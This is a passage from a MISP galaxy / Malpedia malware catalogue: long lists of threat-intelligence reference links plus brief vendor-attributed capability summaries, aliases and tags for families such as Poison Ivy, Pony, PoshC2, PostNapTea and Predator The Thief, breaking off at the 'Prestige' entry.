https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf

https://www.contextis.com/de/blog/avivore

https://www.macnica.net/file/security_report_20160613.pdf

https://www.secureworks.com/research/threat-profiles/bronze-express

https://blog.polyswarm.io/carderbee-targets-hong-kong-in-supply-chain-attack

https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

https://attack.mitre.org/groups/G0001/

https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers

https://www.youtube.com/watch?v=E2_DTQJjDYc

http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html

https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/

https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/

https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt

https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/

https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/

https://www.nortonlifelock.com/sites/default/files/2021-10/OPERATION%20EXORCIST%20White%20Paper.pdf

https://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/

https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf

https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage

https://blog.xorhex.com/blog/mustangpandaplugx-2/

https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html

https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/

https://www.youtube.com/watch?v=6SDdUVejR2w

https://www.secureworks.com/research/threat-profiles/bronze-overbrook

https://www.secureworks.com/research/threat-profiles/bronze-olive

https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn

https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/carderbee-software-supply-chain-certificate-abuse

https://blog.xorhex.com/blog/reddeltaplugxchangeup/

https://securelist.com/cycldek-bridging-the-air-gap/97157/

https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution

https://securelist.com/apt-trends-report-q2-2020/97937/

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/

https://www.splunk.com/en_us/blog/security/unmasking-the-enigma-a-historical-dive-into-the-world-of-plugx-malware.html

https://blog.ensilo.com/uncovering-new-activity-by-apt10

https://www.secureworks.com/research/bronze-president-targets-ngos

https://www.secureworks.com/research/threat-profiles/bronze-riverside

https://attack.mitre.org/groups/G0096

https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/

https://www.contextis.com/en/blog/avivore

http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html

https://www.recordedfuture.com/china-linked-ta428-threat-group

https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://cyberandramen.net/2022/01/06/a-gulp-of-plugx/

https://engineers.ffri.jp/entry/2022/11/30/141346

https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/

https://unit42.paloaltonetworks.com/thor-plugx-variant/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html

https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/

http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html

https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/

https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report

https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf

https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx

https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf

https://unit42.paloaltonetworks.com/unsigned-dlls/

https://redalert.nshc.net/2022/04/14/hacking-activity-of-sectorb-group-in-2021/

https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/

https://asec.ahnlab.com/en/49097/

https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/

https://jsac.jpcert.or.jp/archive/2023/pdf/JSAC2023_2_LT4.pdf

https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-

https://securelist.com/time-of-death-connected-medicine/84315/

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html

https://community.rsa.com/thread/185439

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/

https://www.secureworks.com/research/threat-profiles/bronze-keystone

https://www.secureworks.com/research/threat-profiles/bronze-woodland

https://www.bleepingcomputer.com/news/security/new-mustang-panda-hacking-campaign-targets-diplomats-isps/

https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/

https://raw.githubusercontent.com/m4now4r/Presentations/main/MustangPanda%20-%20Enemy%20at%20the%20gate_final.pdf

https://web.archive.org/web/20200424035112/https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf

https://twitter.com/stvemillertime/status/1261263000960450562

https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html

https://www.secureworks.com/blog/bronze-president-targets-government-officials

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments

https://web.archive.org/web/20191214125833/https://contextis.com/media/downloads/AVIVORE_An_overview.pdf

https://www.secureworks.com/research/threat-profiles/bronze-president

https://go.recordedfuture.com/hubfs/reports/cta-2022-1223.pdf

https://news.sophos.com/en-us/2023/03/09/border-hopping-plugx-usb-worm/

https://www.youtube.com/watch?v=IRh6R8o1Q7U

https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/

https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/

https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf

https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc.html

https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf

https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/

http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html

https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf

https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims

https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf

https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf

https://www.recordedfuture.com/redecho-targeting-indian-power-sector/

https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt

https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf

https://www.youtube.com/watch?v=qEwBGGgWgOM

https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html

https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader

https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf

https://blog.vincss.net/2022/05/re027-china-based-apt-mustang-panda-might-have-still-continued-their-attack-activities-against-organizations-in-Vietnam.html

https://tracker.h3x.eu/info/290

https://twitter.com/xorhex/status/1399906601562165249?s=20

https://www.secureworks.com/research/threat-profiles/bronze-union

https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/

https://www.mandiant.com/resources/blog/infected-usb-steal-secrets

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf

https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.trendmicro.com/en_us/research/23/b/investigating-the-plugx-trojan-disguised-as-a-legitimate-windows.html

https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware

https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/

https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html

https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/

https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf

https://www.welivesecurity.com/fr/2022/03/25/mustang-pandas-hodur-nouveau-korplug/

https://therecord.media/redecho-group-parks-domains-after-public-exposure/

https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor

https://www.contextis.com/en/blog/dll-search-order-hijacking

https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/

https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/

https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf

https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/

https://kienmanowar.wordpress.com/2023/01/09/quicknote-another-nice-plugx-sample/

https://web.archive.org/web/20210925164035/https://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader

https://www.lac.co.jp/lacwatch/people/20171218_001445.html

https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia

https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop

https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf

https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia

https://risky.biz/whatiswinnti/

https://www.youtube.com/watch?v=C_TmANnbS2k

https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/

https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a

https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/

https://www.youtube.com/watch?v=r1zAVX_HnJg

http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/

https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf

https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/

https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html

https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html

https://blog.xorhex.com/blog/mustangpandaplugx-1/

https://www.secureworks.com/research/threat-profiles/bronze-firestone

https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/

https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited

https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html

https://unit42.paloaltonetworks.com/atoms/shallowtaurus/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/

https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf

https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european

https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/

https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf

https://securelist.com/apt-trends-report-q3-2020/99204/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor

PNGLoad

According to ESET Research, PNGLoad is a second-stage payload deployed by Worok on compromised systems and loaded either by CLRLoad or PowHeartBeat. PNGLoad has capabilities to download and execute additional payloads from a C&C server, which is likely how the attackers have deployed PNGLoad on systems compromised with PowHeartBeat. PNGLoad is a loader that uses bytes from PNG files to create a payload to execute. It is a 64-bit .NET executable - obfuscated with .NET Reactor - that masquerades as legitimate software.

The tag is: misp-galaxy:malpedia="PNGLoad"

PNGLoad is also known as:

Table 4280. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.png_load

https://www.welivesecurity.com/2022/09/06/worok-big-picture/

PocoDown

uses POCO C++ cross-platform library, Xor-based string obfuscation, SSL library code and string overlap with Xtunnel, infrastructure overlap with X-Agent, probably in use since mid-2018

The tag is: misp-galaxy:malpedia="PocoDown"

PocoDown is also known as:

  • Blitz

  • PocoDownloader

Table 4281. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown

https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html

https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html

https://twitter.com/cyb3rops/status/1129653190444703744

poisonplug

According to FireEye, POISONPLUG is a highly obfuscated modular backdoor with plug-in capabilities. The malware is capable of registry or service persistence, self-removal, plug-in execution, and network connection forwarding. POISONPLUG has been observed using social platforms to host encoded C&C commands.

The tag is: misp-galaxy:malpedia="poisonplug"

poisonplug is also known as:

  • Barlaiy

Table 4282. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.poisonplug

https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://securelist.com/apt-trends-report-q3-2020/99204/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage

https://content.fireeye.com/apt-41/rpt-apt41/

Poison Ivy

The tag is: misp-galaxy:malpedia="Poison Ivy"

Poison Ivy is also known as:

  • SPIVY

  • pivy

  • poisonivy

Table 4283. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy

http://blogs.360.cn/post/APT_C_01_en.html

https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf

https://unit42.paloaltonetworks.com/atoms/crawling-taurus/

https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf

https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis

https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf

https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html

https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf

https://www.recordedfuture.com/china-linked-ta428-threat-group

https://engineers.ffri.jp/entry/2022/11/30/141346

https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/

http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant

http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf

https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/

https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf

https://vblocalhost.com/uploads/VB2020-20.pdf

https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/

https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html

https://www.secureworks.com/research/threat-profiles/aluminum-saratoga

https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii

https://community.riskiq.com/article/56fa1b2f

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf

https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/

https://us-cert.cisa.gov/ncas/alerts/aa20-275a

https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

https://attack.mitre.org/groups/G0011

https://www.secureworks.com/research/threat-profiles/bronze-union

https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html

https://www.secureworks.com/research/threat-profiles/bronze-firestone

https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology

https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html

https://unit42.paloaltonetworks.com/atoms/shallowtaurus/

https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf

https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html

https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/

https://www.secureworks.com/research/threat-profiles/bronze-keystone

https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf

https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/

https://www.youtube.com/watch?v=1WfPlgtfWnQ

https://www.secureworks.com/research/threat-profiles/bronze-riverside

Polyglot

The tag is: misp-galaxy:malpedia="Polyglot"

Polyglot is also known as:

Table 4288. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom

https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/

Pony

According to KnowBe4, Pony Stealer is a password stealer that can decrypt or unlock passwords for over 110 different applications including VPN, FTP, email, instant messaging, web browsers and much more. Pony Stealer is very dangerous and once it infects a PC it will turn the device into a botnet, allowing it to use the PCs it infects to infect other PCs.

The tag is: misp-galaxy:malpedia="Pony"

Pony is also known as:

  • Fareit

  • Siplog

Table 4290. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pony

https://github.com/nyx0/Pony

https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf

https://www.youtube.com/watch?v=EyDiIAtdI

https://www.secureworks.com/research/threat-profiles/gold-essex

https://www.knowbe4.com/pony-stealer

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

http://www.secureworks.com/research/threat-profiles/gold-essex

https://www.youtube.com/watch?v=y8Z9KnL8s8s

https://www.uperesia.com/analysis-of-a-packed-pony-downloader

https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/

https://www.youtube.com/watch?v=42yldTQ-fWA

http://www.secureworks.com/research/threat-profiles/gold-galleon

https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf

https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection

https://www.secureworks.com/research/threat-profiles/gold-evergreen

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://www.secureworks.com/research/threat-profiles/gold-galleon

https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

http://www.secureworks.com/research/threat-profiles/gold-evergreen

https://intel471.com/blog/a-brief-history-of-ta505

Popcorn Time

The tag is: misp-galaxy:malpedia="Popcorn Time"

Popcorn Time is also known as:

Table 4294. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time

PoshC2

PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.

PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python3 implants with payloads written in PowerShell v2 and v4, C++ and C# source code, a variety of executables, DLLs and raw shellcode in addition to a Python3 payload. These enable C2 functionality on a wide range of devices and operating systems, including Windows, *nix and OSX.

The tag is: misp-galaxy:malpedia="PoshC2"

PoshC2 is also known as:

Table 4298. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/

https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/

https://www.secureworks.com/research/threat-profiles/cobalt-trinity

https://redcanary.com/blog/getsystem-offsec/

https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html

https://paper.seebug.org/1301/

https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf

http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets

https://ti.dbappsecurity.com.cn/blog/articles/2021/09/06/operation-maskface/

https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf

https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md

https://github.com/nettitude/PoshC2_Python/

https://censys.com/russian-ransomware-c2-network-discovered-in-censys-data/

PostNapTea

PostNapTea aka SIGNBT is an HTTP(S) RAT that is written as a complex object-oriented project.

In 2022-2023, it was deployed against targets like a newspaper organization, agriculture-related entity or a software vendor. The initial access was usually achieved by exploiting vulnerabilities in widely-used software in South Korea.

It collects various information about the victim’s computer, such as computer name, product name, OS details, system uptime, CPU information, system locale, time zone, network status, and malware configuration.

PostNapTea uses AES for encryption and decryption ot network traffic. There is a constant prefix SIGNBT occuring in its HTTP POST requests. The prefix is concatenated with 2 characters that identify the communication stage: • LG: logging into the C&C server • KE: acknowledging the succesful login to the C&C • FI: sending the status of a failed operation • SR: sending the status of a successful operation • GC: getting the next command

There are five classes that represent command groups: • CCButton: for file manipulation and screen capturing • CCBitmap: for network commands, implementing functionality of Windows commands often abused by attackers, like sc, reg, arp, net, ver, wmic, ping, whoami, netstat, tracert, lookup, ipconfig, systeminfo, and netsh advfirewall. • CCComboBox: for file system management • CCList: for process management • CCBrush: for control of the malware itself

It stores its configuration in JSON format. It resolves the Windows APIs it requires during runtime, via the Fowler–Noll–Vo (FNV) hash function.

Its internal name in the version-information resource is usually ppcsnap.dll or pconsnap.dll, which loosely inspired its code name.

The tag is: misp-galaxy:malpedia="PostNapTea"

PostNapTea is also known as:

  • SIGNBT

Table 4300. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.postnaptea

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://securelist.com/unveiling-lazarus-new-campaign/110888/

Povlsomware

According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to “securely” test the ransomware protection capabilities of security vendor products.

The tag is: misp-galaxy:malpedia="Povlsomware"

Povlsomware is also known as:

Table 4302. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.povlsomware

https://youtu.be/oYLs6wuoOfg

https://www.trendmicro.com/en_us/research/21/c/povlsomware-ransomware-features-cobalt-strike-compatibility.html

POWERBAND

NET variant of ps1.powerton.

The tag is: misp-galaxy:malpedia="POWERBAND"

POWERBAND is also known as:

Table 4304. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.powerband

https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/

powerkatz

The tag is: misp-galaxy:malpedia="powerkatz"

powerkatz is also known as:

Table 4307. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.powerkatz

https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/

PowerLoader

The tag is: misp-galaxy:malpedia="PowerLoader"

PowerLoader is also known as:

Table 4308. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader

https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html

PowerPool

The tag is: misp-galaxy:malpedia="PowerPool"

PowerPool is also known as:

Table 4309. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool

https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/

prb_backdoor

The tag is: misp-galaxy:malpedia="prb_backdoor"

prb_backdoor is also known as:

Table 4313. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor

https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html

Predator The Thief

Predator is a feature-rich information stealer. It is sold on hacking forums as a bundle which includes: Payload builder and Command and Control web panel. It is able to grab passwords from browsers, replace cryptocurrency wallets, and take photos from the web-camera. It is developed by using a modular approach so that criminals may add more sophisticated tools on top of the it.

The tag is: misp-galaxy:malpedia="Predator The Thief"

Predator The Thief is also known as:

Table 4314. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.predator

https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/

https://www.secureworks.com/research/threat-profiles/gold-galleon

https://securelist.com/a-predatory-tale/89779

https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/

https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/

https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf

Prestige

